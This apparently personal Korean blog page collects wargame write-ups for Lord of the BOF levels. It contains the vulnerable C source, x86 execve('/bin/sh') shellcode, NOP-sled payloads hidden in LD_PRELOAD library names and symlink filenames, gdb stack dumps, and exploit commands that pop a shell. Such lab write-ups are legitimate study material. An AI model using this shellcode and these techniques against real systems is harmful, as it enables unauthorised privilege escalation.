'STUDY' 카테고리의 글 목록 (4 Page)

..

..나는누구..?

...여긴어디....?

이번 문제(뿐만아니라 모든 문제들에)에 한줄기 빛을 떨궈준 cd80형에게 엄청난 감사를 표하는 바입니다.

그래도 LD_PRELOAD쓰는방법은 모름미다. 알거같은데 시도를 안해봤어여. 해봐야징.

[(http://cd80.tistory.com)☜☜ 엄청난 시스해커 블로그!클릭클릭]

로그:

//소스를 처음에 봤는데 memset쪽이 뭔소린지 이해안가서 소스에따가 열씨미 주석달았습니다.

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n"); //아규멘트가 2개 이하면 ㅂㅂ!! :D

exit(0);

}

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n"); //48번째는 \xbf

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// stack destroyer!

memset(buffer, 0, 44); //버퍼의 44바이트를 다 뽀삼-buffer+sfp

memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));

/*그리고 리턴어드레스에 들어간 후의 것들도 다 파개

memset(source, data, amount of data)인데 0xbfffffff - (int)(buffer+48)란 뜻은 buffer+48부터 bfffffff까지의 거리만큼을 다 파괘한단 소리다 절망적이네 */

}

[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f"'`

[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f"'`

[skeleton@localhost skeleton]$ gcc -shared -fPIC asdf.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

//여기서 쉘코드랑 놉썰매를 넣어여. 찾기 쉬워지거든여. 썰매도타공

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

//LD_PRELOAD에 쉘코드뭉치를 넣어요.

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

XRh//shh/binRSÍ̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) q

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

XRh//shh/binRSÍ̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000: Cannot access memory at address 0xbfff0000

(gdb) x/100wx 0xbffff000

0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f

0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620

0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c

[중략..]

0xbffff610: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090

0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090

(gdb)

0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff660: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff670: 0x90909090 0x90909090 0x90909090 0x6a909090

0xbffff680: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69

0xbffff690: 0xe1895352 0x732e80cd 0x4000006f 0x40013868

0xbffff6a0: 0x4000220c 0xbffffbd1 0x00000000 0x00000000

0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000

0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006

0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001

0xbffff710: 0xbffff608 0x00060000 0x00000000 0x00000000

(gdb) q

[skeleton@localhost skeleton]$ vi `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

[skeleton@localhost skeleton]$ gcc -shared -fPIC `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ cat `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

#include<stdio.h>

int main()

{

printf ("wat do i do");

return 31337;

} //소스 뻘글돋네여

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

XRh//shh/binRSÍ̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000: Cannot access memory at address 0xbfff0000

(gdb)

0xbfff0004: Cannot access memory at address 0xbfff0004

(gdb) x/100wx 0xbfff5000

0xbfff5000: Cannot access memory at address 0xbfff5000

(gdb) x/100wx 0xbfff9000

0xbfff9000: Cannot access memory at address 0xbfff9000

(gdb) x/100wx 0xbfffb000

0xbfffb000: Cannot access memory at address 0xbfffb000

(gdb) x/100wx 0xbfffd000

0xbfffd000: Cannot access memory at address 0xbfffd000

(gdb) x/100wx 0xbffff000 //일케 하나하나 스택을 올라감미다

0xbffff000: 0x000005c9 0x0000029f 0x000006a6 0x0000045f

0xbffff010: 0x000006dd 0x000004a6 0x00000000 0x00000620

0xbffff020: 0x0000051e 0x00000000 0x00000584 0x0000069c

0xbffff030: 0x00000716 0x0000054d 0x00000527 0x000004ed

0xbffff040: 0x000003a1 0x00000458 0x00000466 0x0000063f

0xbffff050: 0x00000000 0x000001ca 0x00000000 0x0000027f

[중략..]

0xbffff600: 0x6b732f65 0x74656c65 0x902f6e6f 0x90909090

0xbffff610: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff620: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff630: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff640: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff650: 0x90909090 0x90909090 0x90909090 0x90909090

0xbffff660: 0x90909090 0x90909090 0x90909090 0x6a909090

0xbffff670: 0x5299580b 0x732f2f68 0x622f6868 0xe3896e69

0xbffff680: 0xe1895352 0x732e80cd 0x4000006f 0x40013868

0xbffff690: 0x4000220c 0xbffffbbc 0x00000000 0x00000000

0xbffff6a0: 0x00000000 0x00000000 0x40014a00 0x00000000

0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000006

0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff6f0: 0x00000000 0x00000001 0x00000000 0x00000001

0xbffff700: 0xbffff5f8 0x00060000 0x00000000 0x00000000

0xbffff710: 0x00000000 0x00000001 0x00000000 0x00000000

0xbffff720: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff730: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff740: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff750: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff760: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff770: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffff780: 0x00000000 0x00000000 0x00000000 0x00000000

(gdb) q

The program is running. Exit anyway? (y or n) y

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ q

sh: q: command not found

bash$ exit

exit

[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ my-pass

euid = 511

방식을 안 후에도 삽질을 많이 했는데, 처음엔 "막 뭐 소스의 함수를 후킹하라는건갘ㅋㅋㅋㅋ아닐텐뎈ㅋㅋ"이러며 웃고있다가 LD_PRELOAD는 환경변수잖아여. 그래서 쉐어드 라이브러리명만 쉘코드로 해놨더니 이게 동적링크인걸로 알고있는데 그래서 쉘코드 안떠서..는 뻥이고요 지금보니까 소중히 잘 들어있네 난 무슨뻘짓을 한거지.

암튼 LD_PRELOAD란 공유라이브러리를 프로그램 실행전에 들고와서 스택에 고이고이 저장해둡니다. 찾아보니 그냥 스택에 찌꺼기가 남는다던데 그 이유는 뭔가 좀 복잡하다고 합니다. 그래서 음 그냥 공유라이브러리 파일명을 쉘코드로 하면 됬네여. 그렇네. ㅠ. 풀이 방법을 글로 읽기만 하고 시도해본거라 제가 했다고 할 수는 없지만 다음번에 또 써보고 싶은 기법이에여. ~~간지나잖아~~ 처음에 코드보고 멘붕했는데 그것도 괜찮아진것 같고요 뭐 여러모로 멘붕이었지만 뿌듯하네요 횡설수설 잡담읽어주셔서 감사합니다. 배고프다. 모두들 안녕히주무세여 가정에 평화가 깃들기를

저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

darkknight->bugbear (2)	2014.04.07
golem->darkknight (0)	2014.04.06
vampire->skeleton (2)	2014.02.25
troll->vampire (0)	2013.12.22
orge->troll (0)	2013.12.21

MISCCCCCCCCCC.pdf

장난으로 시작한걸 정말 쓸 줄은 몰랐슴다.

근데 이거 쓰기 시작한건 작년에 시작했는데 중간에 묵혀두다가 오늘 발견하고 후딱 끝내버렸다..

뭔가 조금 허술한 감이 없지않아 많지만, 문서를 쓰는거에 조금 익숙해져야겠다 하고 연습겸 쓴 것 같아요.

언리밋님.. 예제에 풀이를 썼는데... 양해해주세요 +_+..

쓰는건 재미있었습니다ㅋㅋ 컬러풀하니 예쁜가요?

구글드라이브에서 적어서 포맷이 어케되었는지 확인하기 두렵습니다..

저작자표시

'STUDY > Documentation' 카테고리의 다른 글

strace, 제가 한번 사용해 보겠습니다. (0)	2014.07.22
Buffer Overflow (3)	2014.05.18
Key File (0)	2014.05.16
Frame Pointer Overwrite/One Byte Overflow (5)	2014.04.06
[CodeGate Junior Quals] RunCommand 250 (0)	2014.04.06

헠헠헠헠허커헣컿ㅋ헠ㅎ

내가 몇달동안 삽질하다가 아씨 나는 재능이업나보다 할 정도으 ㅣ문제였느데!!!!!!!!!!!!!!!!!

으헝ㄹㅁㄴㅇ럼ㄴ임ㄴㅇㄹ!!!!!!!!!!!!

풀렸쪙!!!!!!!!!!!!!!!

ㅇ름ㄴㄴㄹㄹㄹㄹㅁㄴㅇㄹ

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q `perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffe0 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/?????????????????????????????????????????^12l?u楕凹2핽i00tii0jo??T??

귁?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10x 0xbfffffcd

0xbfffffcd: 0x315e11eb 0x8032b1c9 0x80010f6c 0xf67501e9

0xbfffffdd: 0xeae805eb 0x32ffffff 0x306951c1 0x69697430

0xbfffffed: 0x8a6f6a30 0x8a5451e4

(gdb) x/10x 0xbfffffcc

0xbfffffcc: 0x5e11eb90 0x32b1c931 0x010f6c80 0x7501e980

0xbfffffdc: 0xe805ebf6 0xffffffea 0x6951c132 0x69743030

0xbfffffec: 0x6f6a3069 0x5451e48a

(gdb) q

The program is running. Exit anyway? (y or n) y

[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\xf\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44, "\xcc\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ ln -s ./ssssssss `perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`

argv error

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd/xff/xff/xbf"'`

stack is still your friend.

[vampire@localhost vampire]$ ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\xbf"x44, "\xcd\xff\xff\xbf"'`

옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜?

Segmentation fault (core dumped)

[vampire@localhost vampire]$ gdb -q ./`perl -e 'print "\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` core

warning: core file may not match specified executable file.

Core was generated by ` '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0 0xbfffffcd in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048506

(gdb) r

Starting program: /home/vampire/./h?須?h

켚Thjo??i0chi0tijY

?y?投T?

Breakpoint 1, 0x8048506 in main ()

(gdb) x/10wx 4esp

Invalid number "4esp".

(gdb) x/10wx $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb

(gdb) x/40wx $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb 0x08049720 0x08049734

0xbffffab8: 0xbffffad8 0x400309cb 0x00000001 0xbffffb04

0xbffffac8: 0xbffffb0c 0x40013868 0x00000001 0x08048450

0xbffffad8: 0x00000000 0x08048471 0x08048500 0x00000001

0xbffffae8: 0xbffffb04 0x08048390 0x080486ac 0x4000ae60

0xbffffaf8: 0xbffffafc 0x40013e90 0x00000001 0xbffffbf9

0xbffffb08: 0x00000000 0xbffffc31 0xbffffc53 0xbffffc5d

0xbffffb18: 0xbffffc6b 0xbffffc8a 0xbffffc9a 0xbffffcb4

(gdb)

0xbffffb28: 0xbffffcd1 0xbffffcf0 0xbffffcfb 0xbffffd09

0xbffffb38: 0xbffffd4c 0xbffffd5f 0xbffffd74 0xbffffd84

0xbffffb48: 0xbffffd91 0xbffffdb0 0xbffffdcb 0xbffffdd6

0xbffffb58: 0xbffffde7 0xbffffdf9 0xbffffe01 0x00000000

0xbffffb68: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb78: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffb88: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffb98: 0x00000009 0x08048450 0x0000000b 0x000001fd

0xbffffba8: 0x0000000c 0x000001fd 0x0000000d 0x000001fd

0xbffffbb8: 0x0000000e 0x000001fd 0x00000010 0x0fabfbff

(gdb)

0xbffffbc8: 0x0000000f 0xbffffbf4 0x00000000 0x00000000

0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffbf8: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbffffc08: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbffffc18: 0x30690168 0x30696863 0x146a6974 0x0c0cfe59

0xbffffc28: 0x41fa7949 0xc354e1f7 0x53454c00 0x45504f53

0xbffffc38: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c

0xbffffc48: 0x65706970 0x2068732e 0x55007325 0x4e524553

0xbffffc58: 0x3d454d41 0x53494800 0x5a495354 0x30313d45

(gdb)

0xbffffc68: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c

0xbffffc78: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f

0xbffffc88: 0x4f4c006e 0x4d414e47 0x61763d45 0x7269706d

0xbffffc98: 0x45520065 0x45544f4d 0x54534f48 0x3239313d

0xbffffca8: 0x3836312e 0x2e30312e 0x00313431 0x4c49414d

0xbffffcb8: 0x61762f3d 0x70732f72 0x2f6c6f6f 0x6c69616d

0xbffffcc8: 0x6d61762f 0x65726970 0x43414d00 0x50595448

0xbffffcd8: 0x33693d45 0x722d3638 0x61686465 0x696c2d74

0xbffffce8: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d

0xbffffcf8: 0x48006d72 0x5454534f 0x3d455059 0x36383369

(gdb)

0xbffffd08: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f

0xbffffd18: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273

0xbffffd28: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36

0xbffffd38: 0x682f3a6e 0x2f656d6f 0x706d6176 0x2f657269

0xbffffd48: 0x006e6962 0x454d4f48 0x6f682f3d 0x762f656d

0xbffffd58: 0x69706d61 0x49006572 0x5455504e 0x2f3d4352

0xbffffd68: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbffffd78: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbffffd88: 0x6d61763d 0x65726970 0x53414200 0x4e455f48

0xbffffd98: 0x682f3d56 0x2f656d6f 0x706d6176 0x2f657269

(gdb)

0xbffffda8: 0x7361622e 0x00637268 0x50534944 0x3d59414c

0xbffffdb8: 0x2e323931 0x2e383631 0x312e3031 0x303a3134

0xbffffdc8: 0x4c00302e 0x3d474e41 0x555f6e65 0x534f0053

0xbffffdd8: 0x45505954 0x6e696c3d 0x672d7875 0x5000756e

0xbffffde8: 0x2f3d4457 0x656d6f68 0x6d61762f 0x65726970

0xbffffdf8: 0x4c485300 0x323d4c56 0x5f534c00 0x4f4c4f43

0xbffffe08: 0x6e3d5352 0x30303d6f 0x3d69663a 0x643a3030

0xbffffe18: 0x31303d69 0x3a34333b 0x303d6e6c 0x36333b31

0xbffffe28: 0x3d69703a 0x333b3034 0x6f733a33 0x3b31303d

0xbffffe38: 0x623a3533 0x30343d64 0x3b33333b 0x633a3130

(gdb)

0xbffffe48: 0x30343d64 0x3b33333b 0x6f3a3130 0x31303d72

0xbffffe58: 0x3b35303b 0x343b3733 0x696d3a31 0x3b31303d

0xbffffe68: 0x333b3530 0x31343b37 0x3d78653a 0x333b3130

0xbffffe78: 0x2e2a3a32 0x3d646d63 0x333b3130 0x2e2a3a32

0xbffffe88: 0x3d657865 0x333b3130 0x2e2a3a32 0x3d6d6f63

0xbffffe98: 0x333b3130 0x2e2a3a32 0x3d6d7462 0x333b3130

0xbffffea8: 0x2e2a3a32 0x3d746162 0x333b3130 0x2e2a3a32

0xbffffeb8: 0x303d6873 0x32333b31 0x632e2a3a 0x303d6873

0xbffffec8: 0x32333b31 0x742e2a3a 0x303d7261 0x31333b31

0xbffffed8: 0x742e2a3a 0x303d7a67 0x31333b31 0x612e2a3a

(gdb)

0xbffffee8: 0x303d6a72 0x31333b31 0x742e2a3a 0x303d7a61

0xbffffef8: 0x31333b31 0x6c2e2a3a 0x303d687a 0x31333b31

0xbfffff08: 0x7a2e2a3a 0x303d7069 0x31333b31 0x7a2e2a3a

0xbfffff18: 0x3b31303d 0x2a3a3133 0x303d5a2e 0x31333b31

0xbfffff28: 0x672e2a3a 0x31303d7a 0x3a31333b 0x7a622e2a

0xbfffff38: 0x31303d32 0x3a31333b 0x7a622e2a 0x3b31303d

0xbfffff48: 0x2a3a3133 0x3d7a742e 0x333b3130 0x2e2a3a31

0xbfffff58: 0x3d6d7072 0x333b3130 0x2e2a3a31 0x6f697063

0xbfffff68: 0x3b31303d 0x2a3a3133 0x67706a2e 0x3b31303d

0xbfffff78: 0x2a3a3533 0x6669672e 0x3b31303d 0x2a3a3533

(gdb)

0xbfffff88: 0x706d622e 0x3b31303d 0x2a3a3533 0x6d62782e

0xbfffff98: 0x3b31303d 0x2a3a3533 0x6d70782e 0x3b31303d

0xbfffffa8: 0x2a3a3533 0x676e702e 0x3b31303d 0x2a3a3533

0xbfffffb8: 0x6669742e 0x3b31303d 0x003a3533 0x6d6f682f

0xbfffffc8: 0x61762f65 0x7269706d 0x2f2e2f65 0xcee28a68

0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901

0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79

0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000

(gdb) x/40x $esp

0xbffffa88: 0x080482d0 0x40021ca0 0xbffffab8 0x4000a970

0xbffffa98: 0x400f855b 0x08049734 0x4000ae60 0xbffffb04

0xbffffaa8: 0xbffffab8 0x080484eb 0x08049720 0x08049734

0xbffffab8: 0xbffffad8 0x400309cb 0x00000001 0xbffffb04

0xbffffac8: 0xbffffb0c 0x40013868 0x00000001 0x08048450

0xbffffad8: 0x00000000 0x08048471 0x08048500 0x00000001

0xbffffae8: 0xbffffb04 0x08048390 0x080486ac 0x4000ae60

0xbffffaf8: 0xbffffafc 0x40013e90 0x00000001 0xbffffbf9

0xbffffb08: 0x00000000 0xbffffc31 0xbffffc53 0xbffffc5d

0xbffffb18: 0xbffffc6b 0xbffffc8a 0xbffffc9a 0xbffffcb4

(gdb)

0xbffffb28: 0xbffffcd1 0xbffffcf0 0xbffffcfb 0xbffffd09

0xbffffb38: 0xbffffd4c 0xbffffd5f 0xbffffd74 0xbffffd84

0xbffffb48: 0xbffffd91 0xbffffdb0 0xbffffdcb 0xbffffdd6

0xbffffb58: 0xbffffde7 0xbffffdf9 0xbffffe01 0x00000000

0xbffffb68: 0x00000003 0x08048034 0x00000004 0x00000020

0xbffffb78: 0x00000005 0x00000006 0x00000006 0x00001000

0xbffffb88: 0x00000007 0x40000000 0x00000008 0x00000000

0xbffffb98: 0x00000009 0x08048450 0x0000000b 0x000001fd

0xbffffba8: 0x0000000c 0x000001fd 0x0000000d 0x000001fd

0xbffffbb8: 0x0000000e 0x000001fd 0x00000010 0x0fabfbff

(gdb)

0xbffffbc8: 0x0000000f 0xbffffbf4 0x00000000 0x00000000

0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x36383669

0xbffffbf8: 0x6f682f00 0x762f656d 0x69706d61 0x2e2f6572

0xbffffc08: 0xe28a682f 0xb16881ce 0x6854530c 0xe48a6f6a

0xbffffc18: 0x30690168 0x30696863 0x146a6974 0x0c0cfe59

0xbffffc28: 0x41fa7949 0xc354e1f7 0x53454c00 0x45504f53

0xbffffc38: 0x2f7c3d4e 0x2f727375 0x2f6e6962 0x7373656c

0xbffffc48: 0x65706970 0x2068732e 0x55007325 0x4e524553

0xbffffc58: 0x3d454d41 0x53494800 0x5a495354 0x30313d45

(gdb)

0xbffffc68: 0x48003030 0x4e54534f 0x3d454d41 0x61636f6c

0xbffffc78: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f

0xbffffc88: 0x4f4c006e 0x4d414e47 0x61763d45 0x7269706d

0xbffffc98: 0x45520065 0x45544f4d 0x54534f48 0x3239313d

0xbffffca8: 0x3836312e 0x2e30312e 0x00313431 0x4c49414d

0xbffffcb8: 0x61762f3d 0x70732f72 0x2f6c6f6f 0x6c69616d

0xbffffcc8: 0x6d61762f 0x65726970 0x43414d00 0x50595448

0xbffffcd8: 0x33693d45 0x722d3638 0x61686465 0x696c2d74

0xbffffce8: 0x2d78756e 0x00756e67 0x4d524554 0x6574783d

0xbffffcf8: 0x48006d72 0x5454534f 0x3d455059 0x36383369

(gdb)

0xbffffd08: 0x54415000 0x752f3d48 0x6c2f7273 0x6c61636f

0xbffffd18: 0x6e69622f 0x69622f3a 0x752f3a6e 0x622f7273

0xbffffd28: 0x2f3a6e69 0x2f727375 0x52313158 0x69622f36

0xbffffd38: 0x682f3a6e 0x2f656d6f 0x706d6176 0x2f657269

0xbffffd48: 0x006e6962 0x454d4f48 0x6f682f3d 0x762f656d

0xbffffd58: 0x69706d61 0x49006572 0x5455504e 0x2f3d4352

0xbffffd68: 0x2f637465 0x75706e69 0x00637274 0x4c454853

0xbffffd78: 0x622f3d4c 0x622f6e69 0x00687361 0x52455355

0xbffffd88: 0x6d61763d 0x65726970 0x53414200 0x4e455f48

0xbffffd98: 0x682f3d56 0x2f656d6f 0x706d6176 0x2f657269

(gdb)

0xbffffda8: 0x7361622e 0x00637268 0x50534944 0x3d59414c

